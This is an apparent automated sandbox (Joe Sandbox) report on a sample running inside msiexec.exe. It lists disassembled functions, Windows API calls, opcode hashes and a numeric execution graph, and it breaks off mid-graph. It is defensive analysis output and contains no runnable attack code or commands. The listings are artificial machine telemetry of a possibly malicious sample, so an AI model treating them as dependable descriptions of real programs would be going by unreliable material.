                                                                                              • _free.LIBCMT ref: 24ED536F
                                                                                                • Part of subcall function 24ED571E: HeapFree.KERNEL32(00000000,00000000,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?), ref: 24ED5734
                                                                                                • Part of subcall function 24ED571E: GetLastError.KERNEL32(?,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?,?), ref: 24ED5746
                                                                                              • _free.LIBCMT ref: 24ED5381
                                                                                              • _free.LIBCMT ref: 24ED5394
                                                                                              • _free.LIBCMT ref: 24ED53A5
                                                                                              • _free.LIBCMT ref: 24ED53B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 32bb7915786669dfedc83f922f73eaeec65920262c4678a2ce85d23c614a573a
                                                                                              • Instruction ID: 926269fb1e705e12c85f74ee7ac2f1430f1f5396b37c196698442faaae229234
                                                                                              • Opcode Fuzzy Hash: 32bb7915786669dfedc83f922f73eaeec65920262c4678a2ce85d23c614a573a
                                                                                              • Instruction Fuzzy Hash: 4AF03073E14220DBBB015F2495808583BB9FF28636711124AF812B339CE7B94803CB84
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 24ED4C1D
                                                                                              • _free.LIBCMT ref: 24ED4CE8
                                                                                              • _free.LIBCMT ref: 24ED4CF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Windows\System32\msiexec.exe
                                                                                              • API String ID: 2506810119-1382325751
                                                                                              • Opcode ID: bb02cdb07b0dcc9d8e2f6e170563d3dfbe0c36c0b20a9a5986d345d2e7d456a5
                                                                                              • Instruction ID: a88159e77c805db5b9d145a3732d6600028d481d87fe2e6d34261dfe5f7f07aa
                                                                                              • Opcode Fuzzy Hash: bb02cdb07b0dcc9d8e2f6e170563d3dfbe0c36c0b20a9a5986d345d2e7d456a5
                                                                                              • Instruction Fuzzy Hash: 0C315273B00218EFFB16DFA98984D9EBBFCEFA5714F1041A6F905A7204D6758A42CB50
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,24ED6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 24ED8731
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 24ED87BA
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 24ED87CC
                                                                                              • __freea.LIBCMT ref: 24ED87D5
                                                                                                • Part of subcall function 24ED56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24ED5702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: da9cea70c08c81822883049e18cc11ba1aef38857108d1c2abd6ba9ded3bca71
                                                                                              • Instruction ID: 66885bac19e368490405e45c4c72868b6fcde96473cc13ce532e99fb114de073
                                                                                              • Opcode Fuzzy Hash: da9cea70c08c81822883049e18cc11ba1aef38857108d1c2abd6ba9ded3bca71
                                                                                              • Instruction Fuzzy Hash: 57319C33A0021AEBEB158F65DC80EAF7BA9EF44B14F010168FD24EA194E735D952CB90
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(24EDC7DD), ref: 24EDC7E6
                                                                                              • GetModuleHandleA.KERNEL32(?,24EDC7DD), ref: 24EDC838
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 24EDC860
                                                                                                • Part of subcall function 24EDC803: GetProcAddress.KERNEL32(00000000,24EDC7F4), ref: 24EDC804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 1646373207-0
                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                              • Instruction ID: b7cdf8a391d84d3fdce09cd141237a4b7255feeb03b80c191ff6865a8194b6bd
                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                              • Instruction Fuzzy Hash: C301D21BA85241F8BB1257B44C01EAA9FDC9B276E4B101BB6E240E6193D9A0A507C3A6
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,24ED1D66,00000000,00000000,?,24ED5C88,24ED1D66,00000000,00000000,00000000,?,24ED5E85,00000006,FlsSetValue), ref: 24ED5D13
                                                                                              • GetLastError.KERNEL32(?,24ED5C88,24ED1D66,00000000,00000000,00000000,?,24ED5E85,00000006,FlsSetValue,24EDE190,FlsSetValue,00000000,00000364,?,24ED5BC8), ref: 24ED5D1F
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,24ED5C88,24ED1D66,00000000,00000000,00000000,?,24ED5E85,00000006,FlsSetValue,24EDE190,FlsSetValue,00000000), ref: 24ED5D2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 296ac93d9a9e28c494055df74d116c8eaf81f645a3992b2b8767f6ba4293bb1d
                                                                                              • Instruction ID: e183a495f4a1ee802d199cdc418b793ad7774db8e53f4e1470e5a77d4a181e91
                                                                                              • Opcode Fuzzy Hash: 296ac93d9a9e28c494055df74d116c8eaf81f645a3992b2b8767f6ba4293bb1d
                                                                                              • Instruction Fuzzy Hash: 50018837755222EBF7124A68AC48E5B775DEF466B67100620F917E7184D734D502C7F0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID: : $Se.
                                                                                              • API String ID: 4218353326-4089948878
                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                              • Instruction ID: d7f7824cd161df9eba27a9b5b8afd97ac083ba16ab44ab8429b39c2bb6f2c231
                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                              • Instruction Fuzzy Hash: A211E372A00248AEEB15CFA8D840BDEFBFCAF29204F10405AE545EB262E6705B03C765
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 24ED2903
                                                                                                • Part of subcall function 24ED35D2: RaiseException.KERNEL32(?,?,?,24ED2925,00000000,00000000,00000000,?,?,?,?,?,24ED2925,?,24EE21B8), ref: 24ED3632
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 24ED2920
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                              • String ID: Unknown exception
                                                                                              • API String ID: 3476068407-410509341
                                                                                              • Opcode ID: 1c1c04bf4b7a62938cc2e4137388ba59266ea1e6176376395b0ed49d75f24a0a
                                                                                              • Instruction ID: 0fc2af05ce4694c0f1f74d237de47fc1fd4df9f97cbd92f1ac6ca11d3dbe750c
                                                                                              • Opcode Fuzzy Hash: 1c1c04bf4b7a62938cc2e4137388ba59266ea1e6176376395b0ed49d75f24a0a
                                                                                              • Instruction Fuzzy Hash: 4EF0A437A0420DF7FB04ABA5FC5496D776C9F20654B5086B0FA14AE098FB71EA278590
                                                                                              APIs
                                                                                              • GetOEMCP.KERNEL32(00000000,?,?,24ED6C7C,?), ref: 24ED6A1E
                                                                                              • GetACP.KERNEL32(00000000,?,?,24ED6C7C,?), ref: 24ED6A35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: |l$
                                                                                              • API String ID: 0-3163957810
                                                                                              • Opcode ID: cbf833eb79b8f7c8e642384bd39e7d78160294dab5bef3ddb092d998082c237a
                                                                                              • Instruction ID: 342389470feeca59c89e0dc000cb18af2cb161a673df648515ad72591f7339ec
                                                                                              • Opcode Fuzzy Hash: cbf833eb79b8f7c8e642384bd39e7d78160294dab5bef3ddb092d998082c237a
                                                                                              • Instruction Fuzzy Hash: BDF08C72500108CBF701CBB4C448BAC3778FB4073AF148384F4A99A1D9DBB54956CB41

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.3%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:75
                                                                                              execution_graph 40126 441819 40129 430737 40126->40129 40128 441825 40130 430756 40129->40130 40142 43076d 40129->40142 40131 430774 40130->40131 40132 43075f 40130->40132 40144 43034a memcpy 40131->40144 40143 4169a7 11 API calls 40132->40143 40135 4307ce 40136 430819 memset 40135->40136 40145 415b2c 11 API calls 40135->40145 40136->40142 40137 43077e 40137->40135 40140 4307fa 40137->40140 40137->40142 40139 4307e9 40139->40136 40139->40142 40146 4169a7 11 API calls 40140->40146 40142->40128 40143->40142 40144->40137 40145->40139 40146->40142 37547 442ec6 19 API calls 37721 4152c6 malloc 37722 4152e2 37721->37722 37723 4152ef 37721->37723 37725 416760 11 API calls 37723->37725 37725->37722 37726 4466f4 37745 446904 37726->37745 37728 446700 GetModuleHandleA 37731 446710 __set_app_type __p__fmode __p__commode 37728->37731 37730 4467a4 37732 4467ac __setusermatherr 37730->37732 37733 4467b8 37730->37733 37731->37730 37732->37733 37746 4468f0 _controlfp 37733->37746 37735 4467bd _initterm __wgetmainargs _initterm 37736 44681e GetStartupInfoW 37735->37736 37737 446810 37735->37737 37739 446866 GetModuleHandleA 37736->37739 37747 41276d 37739->37747 37743 446896 exit 37744 44689d _cexit 37743->37744 37744->37737 37745->37728 37746->37735 37748 41277d 37747->37748 37790 4044a4 LoadLibraryW 37748->37790 37750 412785 37751 412789 37750->37751 37798 414b81 37750->37798 37751->37743 37751->37744 37754 4127c8 37804 412465 memset ??2@YAPAXI 37754->37804 37756 4127ea 37816 40ac21 37756->37816 37761 412813 37834 40dd07 memset 37761->37834 37762 412827 37839 40db69 memset 37762->37839 37765 412822 37861 4125b6 ??3@YAXPAX DeleteObject 37765->37861 37767 40ada2 _wcsicmp 37768 41283d 37767->37768 37768->37765 37771 412863 CoInitialize 37768->37771 37844 41268e 37768->37844 37770 412966 37862 40b1ab free free 37770->37862 37860 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37771->37860 37775 41296f 37863 40b633 37775->37863 37777 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37782 412957 CoUninitialize 37777->37782 37787 4128ca 37777->37787 37782->37765 37783 4128d0 TranslateAcceleratorW 37784 412941 GetMessageW 37783->37784 37783->37787 37784->37782 37784->37783 37785 412909 IsDialogMessageW 37785->37784 37785->37787 37786 4128fd IsDialogMessageW 37786->37784 37786->37785 37787->37783 37787->37785 37787->37786 37788 41292b TranslateMessage DispatchMessageW 37787->37788 37789 41291f IsDialogMessageW 37787->37789 37788->37784 37789->37784 37789->37788 37791 4044cf GetProcAddress 37790->37791 37795 4044f7 37790->37795 37792 4044e8 FreeLibrary 37791->37792 37794 4044df 37791->37794 37793 4044f3 37792->37793 37792->37795 37793->37795 37794->37792 37796 404507 MessageBoxW 37795->37796 37797 40451e 37795->37797 37796->37750 37797->37750 37799 414b8a 37798->37799 37800 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37798->37800 37867 40a804 memset 37799->37867 37800->37754 37803 414b9e GetProcAddress 37803->37800 37805 4124e0 37804->37805 37806 412505 ??2@YAPAXI 37805->37806 37807 41251c 37806->37807 37809 412521 37806->37809 37889 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37807->37889 37878 444722 37809->37878 37815 41259b wcscpy 37815->37756 37894 40b1ab free free 37816->37894 37820 40ad4b 37829 40ad76 37820->37829 37907 40a9ce 37820->37907 37821 40a9ce malloc memcpy free free 37825 40ac5c 37821->37825 37823 40ace7 free 37823->37825 37825->37820 37825->37821 37825->37823 37825->37829 37898 40a8d0 7 API calls 37825->37898 37899 4099f4 37825->37899 37895 40aa04 37829->37895 37830 40ada2 37831 40adc9 37830->37831 37832 40adaa 37830->37832 37831->37761 37831->37762 37832->37831 37833 40adb3 _wcsicmp 37832->37833 37833->37831 37833->37832 37913 40dce0 37834->37913 37836 40dd3a GetModuleHandleW 37918 40dba7 37836->37918 37840 40dce0 3 API calls 37839->37840 37841 40db99 37840->37841 37990 40dae1 37841->37990 38004 402f3a 37844->38004 37846 412766 37846->37765 37846->37771 37847 4126d3 _wcsicmp 37848 4126a8 37847->37848 37848->37846 37848->37847 37850 41270a 37848->37850 38038 4125f8 7 API calls 37848->38038 37850->37846 38007 411ac5 37850->38007 37860->37777 37861->37770 37862->37775 37864 40b640 37863->37864 37865 40b639 free 37863->37865 37866 40b1ab free free 37864->37866 37865->37864 37866->37751 37868 40a83b GetSystemDirectoryW 37867->37868 37869 40a84c wcscpy 37867->37869 37868->37869 37874 409719 wcslen 37869->37874 37872 40a881 LoadLibraryW 37873 40a886 37872->37873 37873->37800 37873->37803 37875 409724 37874->37875 37876 409739 wcscat LoadLibraryW 37874->37876 37875->37876 37877 40972c wcscat 37875->37877 37876->37872 37876->37873 37877->37876 37879 444732 37878->37879 37880 444728 DeleteObject 37878->37880 37890 409cc3 37879->37890 37880->37879 37882 412551 37883 4010f9 37882->37883 37884 401130 37883->37884 37885 401134 GetModuleHandleW LoadIconW 37884->37885 37886 401107 wcsncat 37884->37886 37887 40a7be 37885->37887 37886->37884 37888 40a7d2 37887->37888 37888->37815 37888->37888 37889->37809 37893 409bfd memset wcscpy 37890->37893 37892 409cdb CreateFontIndirectW 37892->37882 37893->37892 37894->37825 37896 40aa14 37895->37896 37897 40aa0a free 37895->37897 37896->37830 37897->37896 37898->37825 37900 409a41 37899->37900 37901 4099fb malloc 37899->37901 37900->37825 37903 409a37 37901->37903 37904 409a1c 37901->37904 37903->37825 37905 409a30 free 37904->37905 37906 409a20 memcpy 37904->37906 37905->37903 37906->37905 37908 40a9e7 37907->37908 37909 40a9dc free 37907->37909 37910 4099f4 3 API calls 37908->37910 37911 40a9f2 37909->37911 37910->37911 37912 40a8d0 7 API calls 37911->37912 37912->37829 37937 409bca GetModuleFileNameW 37913->37937 37915 40dce6 wcsrchr 37916 40dcf5 37915->37916 37917 40dcf9 wcscat 37915->37917 37916->37917 37917->37836 37938 44db70 37918->37938 37922 40dbfd 37941 4447d9 37922->37941 37925 40dc34 wcscpy wcscpy 37967 40d6f5 37925->37967 37926 40dc1f wcscpy 37926->37925 37929 40d6f5 3 API calls 37930 40dc73 37929->37930 37931 40d6f5 3 API calls 37930->37931 37932 40dc89 37931->37932 37933 40d6f5 3 API calls 37932->37933 37934 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37933->37934 37973 40da80 37934->37973 37937->37915 37939 40dbb4 memset memset 37938->37939 37940 409bca GetModuleFileNameW 37939->37940 37940->37922 37942 4447f4 37941->37942 37943 40dc1b 37942->37943 37944 444807 ??2@YAPAXI 37942->37944 37943->37925 37943->37926 37945 44481f 37944->37945 37946 444873 _snwprintf 37945->37946 37947 4448ab wcscpy 37945->37947 37980 44474a 8 API calls 37946->37980 37949 4448bb 37947->37949 37981 44474a 8 API calls 37949->37981 37951 4448a7 37951->37947 37951->37949 37952 4448cd 37982 44474a 8 API calls 37952->37982 37954 4448e2 37983 44474a 8 API calls 37954->37983 37956 4448f7 37984 44474a 8 API calls 37956->37984 37958 44490c 37985 44474a 8 API calls 37958->37985 37960 444921 37986 44474a 8 API calls 37960->37986 37962 444936 37987 44474a 8 API calls 37962->37987 37964 44494b 37988 44474a 8 API calls 37964->37988 37966 444960 ??3@YAXPAX 37966->37943 37968 44db70 37967->37968 37969 40d702 memset GetPrivateProfileStringW 37968->37969 37970 40d752 37969->37970 37971 40d75c WritePrivateProfileStringW 37969->37971 37970->37971 37972 40d758 37970->37972 37971->37972 37972->37929 37974 44db70 37973->37974 37975 40da8d memset 37974->37975 37976 40daac LoadStringW 37975->37976 37977 40dac6 37976->37977 37977->37976 37979 40dade 37977->37979 37989 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37977->37989 37979->37765 37980->37951 37981->37952 37982->37954 37983->37956 37984->37958 37985->37960 37986->37962 37987->37964 37988->37966 37989->37977 38000 409b98 GetFileAttributesW 37990->38000 37992 40daea 37993 40daef wcscpy wcscpy GetPrivateProfileIntW 37992->37993 37999 40db63 37992->37999 38001 40d65d GetPrivateProfileStringW 37993->38001 37995 40db3e 38002 40d65d GetPrivateProfileStringW 37995->38002 37997 40db4f 38003 40d65d GetPrivateProfileStringW 37997->38003 37999->37767 38000->37992 38001->37995 38002->37997 38003->37999 38039 40eaff 38004->38039 38008 411ae2 memset 38007->38008 38009 411b8f 38007->38009 38080 409bca GetModuleFileNameW 38008->38080 38021 411a8b 38009->38021 38011 411b0a wcsrchr 38012 411b22 wcscat 38011->38012 38013 411b1f 38011->38013 38081 414770 wcscpy wcscpy wcscpy CloseHandle 38012->38081 38013->38012 38015 411b67 38082 402afb 38015->38082 38019 411b7f 38138 40ea13 SendMessageW memset SendMessageW 38019->38138 38022 402afb 27 API calls 38021->38022 38023 411ac0 38022->38023 38024 4110dc 38023->38024 38025 41113e 38024->38025 38030 4110f0 38024->38030 38163 40969c LoadCursorW SetCursor 38025->38163 38027 411143 38164 444a54 38027->38164 38167 4032b4 38027->38167 38028 4110f7 _wcsicmp 38028->38030 38029 411157 38031 40ada2 _wcsicmp 38029->38031 38030->38025 38030->38028 38185 410c46 10 API calls 38030->38185 38034 411167 38031->38034 38032 4111af 38034->38032 38035 4111a6 qsort 38034->38035 38035->38032 38038->37848 38040 40eb10 38039->38040 38053 40e8e0 38040->38053 38043 40eb6c memcpy memcpy 38044 40ebe1 38043->38044 38045 40ebb7 38043->38045 38044->38043 38046 40ebf2 ??2@YAPAXI ??2@YAPAXI 38044->38046 38045->38044 38050 40d134 16 API calls 38045->38050 38047 40ec2e ??2@YAPAXI 38046->38047 38049 40ec65 38046->38049 38047->38049 38063 40ea7f 38049->38063 38050->38045 38052 402f49 38052->37848 38054 40e8f2 38053->38054 38055 40e8eb ??3@YAXPAX 38053->38055 38056 40e900 38054->38056 38057 40e8f9 ??3@YAXPAX 38054->38057 38055->38054 38058 40e911 38056->38058 38059 40e90a ??3@YAXPAX 38056->38059 38057->38056 38060 40e931 ??2@YAPAXI ??2@YAPAXI 38058->38060 38061 40e921 ??3@YAXPAX 38058->38061 38062 40e92a ??3@YAXPAX 38058->38062 38059->38058 38060->38043 38061->38062 38062->38060 38064 40aa04 free 38063->38064 38065 40ea88 38064->38065 38066 40aa04 free 38065->38066 38067 40ea90 38066->38067 38068 40aa04 free 38067->38068 38069 40ea98 38068->38069 38070 40aa04 free 38069->38070 38071 40eaa0 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eab3 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40eabd 38074->38075 38076 40a9ce 4 API calls 38075->38076 38077 40eac7 38076->38077 38078 40a9ce 4 API calls 38077->38078 38079 40ead1 38078->38079 38079->38052 38080->38011 38081->38015 38139 40b2cc 38082->38139 38084 402b0a 38085 40b2cc 27 API calls 38084->38085 38086 402b23 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b3a 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b54 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b6b 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402b82 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b99 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bb0 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bc7 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402bde 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402bf5 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c0c 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c23 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c3a 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c51 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c68 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c7f 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c99 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cb3 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402cd5 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402cf0 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d0b 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d26 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d3e 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d59 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d78 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d93 38135->38136 38137 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38136->38137 38137->38019 38138->38009 38142 40b58d 38139->38142 38141 40b2d1 38141->38084 38143 40b5a4 GetModuleHandleW FindResourceW 38142->38143 38144 40b62e 38142->38144 38145 40b5c2 LoadResource 38143->38145 38147 40b5e7 38143->38147 38144->38141 38146 40b5d0 SizeofResource LockResource 38145->38146 38145->38147 38146->38147 38147->38144 38155 40afcf 38147->38155 38149 40b608 memcpy 38158 40b4d3 memcpy 38149->38158 38151 40b61e 38159 40b3c1 18 API calls 38151->38159 38153 40b626 38160 40b04b 38153->38160 38156 40b04b ??3@YAXPAX 38155->38156 38157 40afd7 ??2@YAPAXI 38156->38157 38157->38149 38158->38151 38159->38153 38161 40b051 ??3@YAXPAX 38160->38161 38162 40b05f 38160->38162 38161->38162 38162->38144 38163->38027 38165 444a64 FreeLibrary 38164->38165 38166 444a83 38164->38166 38165->38166 38166->38029 38168 4032c4 38167->38168 38169 40b633 free 38168->38169 38170 403316 38169->38170 38186 44553b 38170->38186 38174 403480 38384 40368c 15 API calls 38174->38384 38176 403489 38177 40b633 free 38176->38177 38178 403495 38177->38178 38178->38029 38179 4033a9 memset memcpy 38180 4033ec wcscmp 38179->38180 38181 40333c 38179->38181 38180->38181 38181->38174 38181->38179 38181->38180 38382 4028e7 11 API calls 38181->38382 38383 40f508 6 API calls 38181->38383 38183 403421 _wcsicmp 38183->38181 38185->38030 38187 445548 38186->38187 38188 445599 38187->38188 38385 40c768 38187->38385 38190 4455a8 memset 38188->38190 38271 4457f2 38188->38271 38468 403988 38190->38468 38196 4458aa 38198 44594a 38196->38198 38199 4458bb memset memset 38196->38199 38197 445672 38479 403fbe memset memset memset memset memset 38197->38479 38201 4459ed 38198->38201 38202 44595e memset memset 38198->38202 38204 414c2e 14 API calls 38199->38204 38212 445a00 memset memset 38201->38212 38213 445b22 38201->38213 38208 414c2e 14 API calls 38202->38208 38203 4455e5 38203->38197 38216 44560f 38203->38216 38209 4458f9 38204->38209 38205 44557a 38210 44558c 38205->38210 38663 4136c0 CoTaskMemFree 38205->38663 38206 445854 38206->38196 38593 403c9c memset memset memset memset memset 38206->38593 38214 44599c 38208->38214 38215 40b2cc 27 API calls 38209->38215 38452 444b06 38210->38452 38616 414c2e 38212->38616 38219 445bca 38213->38219 38220 445b38 memset memset memset 38213->38220 38226 40b2cc 27 API calls 38214->38226 38227 445909 38215->38227 38229 4087b3 337 API calls 38216->38229 38218 445849 38679 40b1ab free free 38218->38679 38228 445c8b memset memset 38219->38228 38284 445cf0 38219->38284 38232 445bd4 38220->38232 38233 445b98 38220->38233 38234 4459ac 38226->38234 38243 409d1f 6 API calls 38227->38243 38235 414c2e 14 API calls 38228->38235 38244 445621 38229->38244 38230 445585 38664 41366b FreeLibrary 38230->38664 38231 44589f 38680 40b1ab free free 38231->38680 38241 414c2e 14 API calls 38232->38241 38233->38232 38237 445ba2 38233->38237 38246 409d1f 6 API calls 38234->38246 38247 445cc9 38235->38247 38750 4099c6 wcslen 38237->38750 38238 4456b2 38667 40b1ab free free 38238->38667 38239 40b2cc 27 API calls 38250 445a4f 38239->38250 38252 445be2 38241->38252 38242 403335 38381 4452e5 45 API calls 38242->38381 38255 445919 38243->38255 38665 4454bf 20 API calls 38244->38665 38245 445823 38245->38218 38264 4087b3 337 API calls 38245->38264 38257 4459bc 38246->38257 38258 409d1f 6 API calls 38247->38258 38248 445879 38248->38231 38268 4087b3 337 API calls 38248->38268 38629 409d1f wcslen wcslen 38250->38629 38262 40b2cc 27 API calls 38252->38262 38253 445d3d 38282 40b2cc 27 API calls 38253->38282 38254 445d88 memset memset memset 38256 414c2e 14 API calls 38254->38256 38681 409b98 GetFileAttributesW 38255->38681 38265 445dde 38256->38265 38746 409b98 GetFileAttributesW 38257->38746 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38260 445680 38260->38238 38502 4087b3 memset 38260->38502 38272 445bf3 38262->38272 38264->38245 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38248 38271->38206 38570 403e2d memset memset memset memset memset 38271->38570 38281 409d1f 6 API calls 38272->38281 38273 445928 38273->38198 38682 40b6ef 38273->38682 38283 445def 38275->38283 38276 4459cb 38276->38201 38294 